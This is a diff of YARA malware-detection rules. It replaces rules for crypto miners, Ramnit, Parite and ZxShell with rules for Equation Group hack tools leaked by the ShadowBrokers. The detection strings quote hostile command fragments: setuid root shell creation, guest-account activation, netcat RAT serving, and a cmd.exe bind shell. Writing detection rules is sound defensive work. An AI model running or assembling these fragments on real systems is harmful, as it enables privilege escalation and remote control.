 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f9cf4a15be0ab35a0d0f0c9b1a191f623f905c8fc9da651872de7c025a27a806"
+		logic_hash = "82d00b7eecdb60911ecd933387eeb2ce4eec9721993beee60247d1273ad3368f"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a340e5b5cfd41076bd4d6ad89d7157eeac264db97a9dddaae15d935937f10d75"
 
 	strings:
-		$x1 = "xownxloxadDxatxxax" wide
-		$s2 = "https://cdn.discordapp.com/attachments/" wide
+		$x1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"" fullword ascii
+		$x2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" fullword ascii
+		$x3 = "CALLBACK_PORT=32177" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		( uint16( 0 ) == 0x2123 and filesize < 3KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_MAL_XMR_Miner_May19_1 : HIGHVOL FILE
+rule SIGNATURE_BASE_Equationgroup_Eh_1_1_0 : FILE
 {
 	meta:
-		description = "Detects Monero Crypto Coin Miner"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file eh.1.1.0.0"
 		author = "Florian Roth (Nextron Systems)"
-		id = "233d1d47-de67-55a9-ae7e-46b5dd34e6ce"
-		date = "2019-05-31"
+		id = "a6f0ec1f-b0e5-5913-970d-9cdadf647c44"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_nansh0u.yar#L15-L36"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L153-L168"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "85a65fd2355850b7f5261ad41091e181562938356ba3dae7d867f7ac8922a16e"
-		score = 85
+		logic_hash = "d0972bb57076606b3c84f3cbbb0be85cd5663c7cd6f6d9f09a2991cb6532bfa9"
+		score = 75
 		quality = 85
-		tags = "HIGHVOL, FILE"
-		hash1 = "d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0f8dd094516f1be96da5f9addc0f97bcac8f2a348374bd9631aa912344559628"
 
 	strings:
-		$x1 = "donate.ssl.xmrig.com" fullword ascii
-		$x2 = "* COMMANDS     'h' hashrate, 'p' pause, 'r' resume" fullword ascii
-		$s1 = "[%s] login error code: %d" fullword ascii
-		$s2 = "\\\\?\\pipe\\uv\\%p-%lu" fullword ascii
+		$x1 = "usage: %s -e -v -i target IP [-c Cert File] [-k Key File]" fullword ascii
+		$x2 = "TYPE=licxfer&ftp=%s&source=/var/home/ftp/pub&version=NA&licfile=" ascii
+		$x3 = "[-l Log File] [-m save MAC time file(s)] [-p Server Port]" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 14000KB and ( pe.imphash ( ) == "25d9618d1e16608cd5d14d8ad6e1f98e" or 1 of ( $x* ) or 2 of them )
+		( uint16( 0 ) == 0x457f and filesize < 100KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_HKTL_CN_Prochook_May19_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Evolvingstrategy_1_0_1 : FILE
 {
 	meta:
-		description = "Detects hacktool used by Chinese threat groups"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file evolvingstrategy.1.0.1.1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ae4e2613-8254-5ea6-af88-2f08ebe4da33"
-		date = "2019-05-31"
+		id = "465f709b-1791-5b36-836b-7a0c08bb9b88"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_nansh0u.yar#L38-L49"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L170-L188"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "de55990c130702a05e96ee769707a81ce0ec58a515d75a9a99b20265ce3db682"
+		logic_hash = "87d25f1a4ca4a75292ab6cdcd1a79890c4475c2a9b34761ed92988bd517b4497"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "02ebdc1ff6075c15a44711ccd88be9d6d1b47607fea17bef7e5e17f8da35293e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fe70e16715992cc86bbef3e71240f55c7d73815b4247d7e866c845b970233c1b"
+
+	strings:
+		$s1 = "chown root sh; chmod 4777 sh;" fullword ascii
+		$s2 = "cp /bin/sh .;chown root sh;" fullword ascii
+		$l1 = "echo clean up when elevated:" fullword ascii
+		$x1 = "EXE=$DIR/sbin/ey_vrupdate" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and pe.imphash ( ) == "343d580dd50ee724746a5c28f752b709"
+		( filesize < 4KB and 1 of them )
 }
-rule SIGNATURE_BASE_SUSP_PDB_CN_Threat_Actor_May19_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toast_V3_2_0 : FILE
 {
 	meta:
-		description = "Detects PDB path user name used by Chinese threat actors"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file toast_v3.2.0.1-linux"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fc6969ed-5fc1-5b3b-9659-c6fc1c9e2f9c"
-		date = "2019-05-31"
+		id = "776014ae-be94-5d81-bceb-fefb67ee1994"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_nansh0u.yar#L52-L65"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L190-L205"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "adcfe3d4bc6fcaf6be4f70c91fb2150bfa2d61f1ba84f96a0bf0c39ed0380b6a"
-		score = 65
+		logic_hash = "a505eaafb6882e2701fe0a9b8712f85c1073d83291436eeaa7f4c52876d12359"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "01c3882e8141a25abe37bb826ab115c52fd3d109c4a1b898c0c78cee8dac94b4"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2ce2d16d24069dc29cf1464819a9dc6deed38d1e5ffc86d175b06ddb691b648b"
 
 	strings:
-		$x1 = "C:\\Users\\zcg\\Desktop\\" ascii
+		$x2 = "Del --- Usage: %s -l file -w wtmp -r user" fullword ascii
+		$s5 = "Roasting ->%s<- at ->%d:%d<-" ascii
+		$s6 = "rbnoil -Roasting ->" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
+		( uint16( 0 ) == 0x457f and filesize < 50KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_MAL_Ramnit_May19_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Sshobo : FILE
 {
 	meta:
-		description = "Detects Ramnit malware"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file sshobo"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f8fa3557-556e-5680-9f1a-2ecf118ade75"
-		date = "2019-05-31"
+		id = "b9392aec-34a8-5ad2-b3fd-eea907d19701"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_nansh0u.yar#L67-L78"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L207-L223"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "51d574f457c37eba3c29f869e03244b9471be6f6c8319aa0ddfad34be748eb53"
+		logic_hash = "90c892e06ccedb6a3208d728e9f3c27c14bbe1b4c13b63d4a350bbbf38efbe9d"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "d7ec3fcd80b3961e5bab97015c91c843803bb915c13a4a35dfb5e9bdf556c6d3"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c7491898a0a77981c44847eb00fb0b186aa79a219a35ebbca944d627eefa7d45"
+
+	strings:
+		$x1 = "Requested forwarding of port %d but user is not root." fullword ascii
+		$x2 = "internal error: we do not read, but chan_read_failed for istate" fullword ascii
+		$x3 = "~#  - list forwarded connections" fullword ascii
+		$x4 = "packet_inject_ignore: block" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and pe.imphash ( ) == "500cd02578808f964519eb2c85153046"
+		( uint16( 0 ) == 0x457f and filesize < 600KB and all of them )
 }
-rule SIGNATURE_BASE_MAL_Parite_Malware_May19_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Magicjack_V1_1_0_0_Client_1_1_0_0 : FILE
 {
 	meta:
-		description = "Detects Parite malware"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file magicjack_v1.1.0.0_client-1.1.0.0.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f4c9da17-9894-5243-828a-827accb0bac5"
-		date = "2019-05-31"
+		id = "008cb5cf-1d2d-5312-9474-2f93db190974"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_nansh0u.yar#L80-L100"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L225-L239"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b458b05178f18be1e936c1b42bbd91c739f288570fca759b85f1bb143899f1a8"
-		score = 80
+		logic_hash = "44e853b8d148f84107d29449aa44b2e52226c9d2f397c019aa0f1d347863e388"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "c9d8852745e81f3bfc09c0a3570d018ae8298af675e3c6ee81ba5b594ff6abb8"
-		hash2 = "8d47b08504dcf694928e12a6aa372e7fa65d0d6744429e808ff8e225aefa5af2"
-		hash3 = "285e3f21dd1721af2352196628bada81050e4829fb1bb3f8757a45c221737319"
-		hash4 = "b987dcc752d9ceb3b0e6cd4370c28567be44b789e8ed8a90c41aa439437321c5"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1"
 
 	strings:
-		$s1 = "taskkill /im cmd.exe /f" fullword ascii
-		$s2 = "LOADERX64.dll" fullword ascii
-		$x1 = "\\dllhot.exe" ascii
-		$x2 = "dllhot.exe --auto --any --forever --keepalive" fullword ascii
+		$x1 = "result = self.send_command(\"ls -al %s\" % self.options.DIR)" fullword ascii
+		$x2 = "cmd += \"D=-l%s \" % self.options.LISTEN_PORT" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10000KB and ( 1 of ( $x* ) or 2 of them )
+		( uint16( 0 ) == 0x2123 and filesize < 80KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_MAL_Parite_Malware_May19_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Packrat : FILE
 {
 	meta:
-		description = "Detects Parite malware based on Imphash"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file packrat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "33970268-610c-5abf-9e9e-83dae0c81064"
-		date = "2019-05-31"
+		id = "4c0619c4-728f-591f-aa02-7c28f1f42fd1"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_nansh0u.yar#L102-L118"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L241-L256"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "060a26ed6679b7038f1a89385220ad9112d3102023ea9d141332077f79bbe728"
+		logic_hash = "7e88e14e0d9c8e8f5ccca3bea78b875bf75fbf0dd54badc339237ca94f0d6373"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "c9d8852745e81f3bfc09c0a3570d018ae8298af675e3c6ee81ba5b594ff6abb8"
-		hash2 = "8d47b08504dcf694928e12a6aa372e7fa65d0d6744429e808ff8e225aefa5af2"
-		hash3 = "285e3f21dd1721af2352196628bada81050e4829fb1bb3f8757a45c221737319"
-		hash4 = "b987dcc752d9ceb3b0e6cd4370c28567be44b789e8ed8a90c41aa439437321c5"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d3e067879c51947d715fc2cf0d8d91c897fe9f50cae6784739b5c17e8a8559cf"
+
+	strings:
+		$x2 = "Use this on target to get your RAT:" fullword ascii
+		$x3 = "$ratremotename && " fullword ascii
+		$x5 = "$command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 18000KB and ( pe.imphash ( ) == "b132a2719be01a6ef87d9939d785e19e" or pe.imphash ( ) == "78f4f885323ffee9f8fa011455d0523d" )
+		( filesize < 70KB and 1 of them )
 }
-rule SIGNATURE_BASE_EXPL_Strings_CVE_POC_May19_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Telex : FILE
 {
 	meta:
-		description = "Detects strings used in CVE POC noticed in May 2019"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file telex"
 		author = "Florian Roth (Nextron Systems)"
-		id = "df11e0b1-e907-5a24-a3e7-0e78acb379f7"
-		date = "2019-05-31"
+		id = "23571734-869d-5d68-9339-d82f168c2e47"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_nansh0u.yar#L120-L136"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L258-L274"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b470e9f5716130d810e519abb8d4e1058b5a806d59ddae53a40cac5597fbb874"
-		score = 80
+		logic_hash = "9661bc43831307cb04883cfe8e54ebb2fe72bf3d7731b2b483cd19c40a5aeaa9"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "01c3882e8141a25abe37bb826ab115c52fd3d109c4a1b898c0c78cee8dac94b4"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e9713b15fc164e0f64783e7a2eac189a40e0a60e2268bd7132cfdc624dfe54ef"
 
 	strings:
-		$x1 = "\\Debug\\poc_cve_20" ascii
-		$x2 = "\\Release\\poc_cve_20" ascii
-		$x3 = "alloc fake fail: %x!" fullword ascii
-		$x4 = "Allocate fake tagWnd fail!" fullword ascii
+		$x1 = "usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>" fullword ascii
+		$x2 = "target is not vulnerable. exiting" fullword ascii
+		$s3 = "Sending final buffer: evil_blocks and shellcode..." fullword ascii
+		$s4 = "Timeout waiting for daemon to die.  Exploit probably failed." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
+		( uint16( 0 ) == 0x457f and filesize < 50KB and 1 of them )
 }
-rule SIGNATURE_BASE_Zxshell_Related_Malware_CN_Group_Jul17_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Calserver : FILE
 {
 	meta:
-		description = "Detects a ZxShell related sample from a CN threat group"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file calserver"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a91e39bb-1bb3-54a8-b684-d673c445375c"
-		date = "2017-07-08"
+		id = "abe935ee-8579-54f0-b6d3-172d6e2c0482"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://blogs.rsa.com/cat-phishing/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_zxshell.yar#L12-L30"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L276-L291"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "30195ff91bd62e32784040f9ec2cf72db90ef1c75056abfd9740f35ce1baccd9"
+		logic_hash = "85080074058703a696ac7f978abd8f4d5234f6553c19736fb52375421c4af42b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ef56c2609bc1b90f3e04745890235e6052a4be94e35e38b6f69b64fb17a7064e"
+		hash1 = "048625e9a0ca46d7fe221e262c8dd05e7a5339990ffae2fb65a9b0d705ad6099"
 
 	strings:
-		$x1 = "CMD.EXE /C NET USER GUEST /ACTIVE:yes && NET USER GUEST ++++++" ascii
-		$x2 = "system\\cURRENTcONTROLSET\\sERVICES\\tERMSERVICE" fullword ascii
-		$x3 = "\\secivreS\\teSlortnoCtnerruC\\METSYS" ascii
-		$x4 = "system\\cURRENTCONTROLSET\\cONTROL\\tERMINAL sERVER" fullword ascii
-		$x5 = "sOFTWARE\\mICROSOFT\\iNTERNET eXPLORER\\mAIN" fullword ascii
-		$x6 = "eNABLEaDMINtsREMOTE" fullword ascii
+		$x1 = "usage: %s <host> <port> e <contents of a local file to be executed on target>" fullword ascii
+		$x2 = "Writing your %s to target." fullword ascii
+		$x3 = "(e)xploit, (r)ead, (m)ove and then write, (w)rite" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them )
+		( uint16( 0 ) == 0x457f and filesize < 30KB and 1 of them )
 }
-rule SIGNATURE_BASE_Zxshell_Related_Malware_CN_Group_Jul17_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Porkclient : FILE
 {
 	meta:
-		description = "Detects a ZxShell related sample from a CN threat group"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file porkclient"
 		author = "Florian Roth (Nextron Systems)"
-		id = "37c1f26b-4b4f-510e-a7b7-b2afb17d6e71"
-		date = "2017-07-08"
+		id = "5b34d5f9-bc76-5cc7-92f7-32c2b7ef7bcf"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://blogs.rsa.com/cat-phishing/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_zxshell.yar#L32-L58"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L293-L308"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d7c9f2af3842d60cf4b0b64bdb687a32014b449b42b101394e0424c12fc2808e"
+		logic_hash = "4de13f1cac8698fc86e44d29143877924aec4e6712415ee6b35810afed8072d6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "204273675526649b7243ee48efbb7e2bc05239f7f9015fbc4fb65f0ada64759e"
+		hash1 = "5c14e3bcbf230a1d7e2909876b045e34b1486c8df3c85fb582d9c93ad7c57748"
 
 	strings:
-		$u1 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)" fullword ascii
-		$u2 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
-		$u3 = "User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0" fullword ascii
-		$u4 = "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
-		$x1 = "\\\\%s\\admin$\\g1fd.exe" fullword ascii
-		$x2 = "C:\\g1fd.exe" fullword ascii
-		$x3 = "\\\\%s\\C$\\NewArean.exe" fullword ascii
-		$s0 = "at \\\\%s %d:%d %s" fullword ascii
-		$s1 = "%c%c%c%c%ccn.exe" fullword ascii
-		$s2 = "hra%u.dll" fullword ascii
-		$s3 = "Referer: http://%s:80/http://%s" fullword ascii
-		$s5 = "Accept-Language: zh-cn" fullword ascii
+		$s1 = "-c COMMAND: shell command string" fullword ascii
+		$s2 = "Cannot combine shell command mode with args to do socket reuse" fullword ascii
+		$s3 = "-r: Reuse socket for Nopen connection (requires -t, -d, -f, -n, NO -c)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 3 of them )
+		( uint16( 0 ) == 0x457f and filesize < 30KB and 1 of them )
 }
-rule SIGNATURE_BASE_Zxshell_Related_Malware_CN_Group_Jul17_3 : FILE
+rule SIGNATURE_BASE_Equationgroup_Electricslide : FILE
 {
 	meta:
-		description = "Detects a ZxShell related sample from a CN threat group"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file electricslide"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1900b861-b4a2-50b5-a639-3eb442072139"
-		date = "2017-07-08"
+		id = "5b1e5293-806a-58e6-b865-66025c8d8c32"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://blogs.rsa.com/cat-phishing/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_zxshell.yar#L60-L74"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L310-L326"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1d7dd59cf6ef24ce47431f9f3fbc980019880082b4e6162bae70b64abaa26db7"
+		logic_hash = "0803b61afc592d4fba523dc54d8f856a557b916a9f6e256efccd50178e8e024c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2e5cf8c785dc081e5c2b43a4a785713c0ae032c5f86ccbc7abf5c109b8854ed7"
+		hash1 = "d27814b725568fa73641e86fa51850a17e54905c045b8b31a9a5b6d2bdc6f014"
 
 	strings:
-		$s1 = "%s\\nt%s.dll" fullword ascii
-		$s2 = "RegQueryValueEx(Svchost\\netsvcs)" fullword ascii
+		$x1 = "Firing with the same hosts, on altername ports (target is on 8080, listener on 443)" fullword ascii
+		$x2 = "Recieved Unknown Command Payload: 0x%x" fullword ascii
+		$x3 = "Usage: eslide   [options] <-t profile> <-l listenerip> <targetip>" fullword ascii
+		$x4 = "-------- Delete Key - Remove a *closed* tab" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them )
+		( uint16( 0 ) == 0x457f and filesize < 2000KB and 1 of them )
 }
-rule SIGNATURE_BASE_Zxshell_Jul17 : FILE
+rule SIGNATURE_BASE_Equationgroup_Libxmexploit2 : FILE
 {
 	meta:
-		description = "Detects a ZxShell - CN threat group"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file libXmexploit2.8"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1b009b20-5a19-5cac-aaaf-ca61310eab9f"
-		date = "2017-07-08"
+		id = "30e94123-acc9-5185-9f5b-1f956c4cf3d1"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://blogs.rsa.com/cat-phishing/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_zxshell.yar#L76-L101"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L328-L343"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2c7467417ffc8b0ed3037ace9ce4183c9d4a90d1c087a420dd3c7a9c422621b1"
+		logic_hash = "7bd88d15cca38e91c65e8373194e35ab9492a80eb27b22ad4000e192f2d9b886"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16"
+		hash1 = "d7ed0234d074266cb37dd6a6a60119adb7d75cc6cc3b38654c8951b643944796"
 
 	strings:
-		$x1 = "zxplug -add" fullword ascii
-		$x2 = "getxxx c:\\xyz.dll" fullword ascii
-		$x3 = "downfile -d c:\\windows\\update.exe" fullword ascii
-		$x4 = "-fromurl http://x.x.x/x.dll" fullword ascii
-		$x5 = "ping 127.0.0.1 -n 7&cmd.exe /c net start %s" fullword ascii
-		$x6 = "ZXNC -e cmd.exe x.x.x.x" fullword ascii
-		$x7 = "(bind a cmdshell)" fullword ascii
-		$x8 = "ZXFtpServer 21 20 zx" fullword ascii
-		$x9 = "ZXHttpServer" fullword ascii
-		$x10 = "c:\\error.htm,.exe|c:\\a.exe,.zip|c:\\b.zip\"" fullword ascii
-		$x11 = "c:\\windows\\clipboardlog.txt" fullword ascii
-		$x12 = "AntiSniff -a wireshark.exe" fullword ascii
-		$x13 = "c:\\windows\\keylog.txt" fullword ascii
+		$s1 = "Usage: ./exp command display_to_return_to" fullword ascii
+		$s2 = "sizeof shellcode = %d" fullword ascii
+		$s3 = "Execve failed!" fullword ascii
 
 	condition:
-		( filesize < 10000KB and 1 of them ) or 3 of them
+		( uint16( 0 ) == 0x457f and filesize < 40KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_Zxshell_20171211_Chrsben : FILE
+rule SIGNATURE_BASE_Equationgroup_Wrap_Telnet : FILE
 {
 	meta:
-		description = "Detects ZxShell variant surfaced in Dec 17"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file wrap-telnet.sh"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3bbfddb8-011a-52dd-b0c8-b35e6f740507"
-		date = "2017-12-11"
+		id = "158e6ebc-6b43-5e94-9052-31408d848875"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/snc85M"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_zxshell.yar#L115-L138"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L345-L360"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "361441404582b0eaca25954f7fe1a3a3b9fefd15cac78d61408bc50aeb78bb61"
